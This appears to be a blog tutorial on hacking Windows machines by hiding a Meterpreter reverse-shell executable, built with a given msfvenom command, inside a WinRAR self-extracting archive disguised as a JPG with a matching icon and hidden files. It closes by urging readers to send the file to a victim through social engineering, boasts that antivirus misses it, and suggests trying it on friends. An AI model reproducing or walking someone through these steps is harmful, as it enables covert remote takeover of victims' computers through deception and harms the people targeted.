Hello friends, today we are going to learn something very interesting! Yes we will see, how to hack Windows using image file. Oh yeah, just an image! I know that most of you are fantasized to know how to hack windows only by using an image. Such that whenever you open the image the payload embedded into it will run automatically and get executed providing us with a backdoor connection.
To do so first we need a payload which could provide us with a meterpreter connection when executed. You can create various kinds of payload for windows using various tools like Metasploit, venom, Fat Rat and much more. For more on exploiting windows using payload read our tutorials here! But in case if you want to generate a simple payload for the backdoor connection then boot up Kali Linux and type in the following command
msfvenom –p windows/meterpreter/reverse_tcp LHOST=___.___.___.___ LPORT=……. -f exe –o /root/Desktop/test.exe
as shown in the following screenshot:
Don’t forget to replace your LHOST value with your ip address. To know your ip address type “ifconfig” in another terminal and for LPORT choose any port. But I would recommend creating a non-detectable payload using other tools available.
I already have a payload file created named test.exe along with the image file hacker.jpg [which I would be using as the payload carrier] as in the following screenshot:
Now to create an image embedded with the payload we will use the features of WinRAR provided to us. So let’s get started…
First, we need to make an icon file of the image we have chosen as the payload carrier. To do this open the browser and search for “image to icon converter”
Make an icon of maximum size and shape relevant to the original image.
Now we have three files:
- exe [payload]
- Image [hacker.jpg]
- Icon [hacker.ico]
- First select the two files[ payload(test.exe)+image(hacker.jpg)] and right click to make an archive as shown below.
- When you are prompted with the archive options make the following changes.
- Change the file name
- Change the compression to Best
- Click on SFX archive
As shown in the following screenshot:
- From advanced tab go to SFX Options as in the screenshot:
- Move to the update tab of the sfx option and select the following as in the screenshot to update and replace if any of the files with the same name already existed.
- Now move to the setup tab and mention the files to be executed after the zip is opened.
- From the Text and Icon tab and select the icon file you downloaded and load it to spx icon
- To hide these files from the zip we need to move to mode tab and select hide all as in the following screenshot:
Now click ok and see the magic, you will get a file with the name you have chosen for the zip archive file to be.
Hacking Windows using this image!
Send the file to your victim using any social engineering vector and when he clicks on the file, then the image opens up and the payload runs and is executed in the background without any notification or pop-ups, as the victim observe that the icon is only opened he doesn’t suspect it to be malicious, thus we can make a successful attack through this method without being caught both from users sides and Anti-virus also failed it to recognise.
I hope this tutorial had taught you a new trick which you can try on with your friends, the best part is that if you wish to develop hacking skills and become an ethical hacker then start thinking like a hacker.
Comment your queries or feedback on this piece of tutorial below!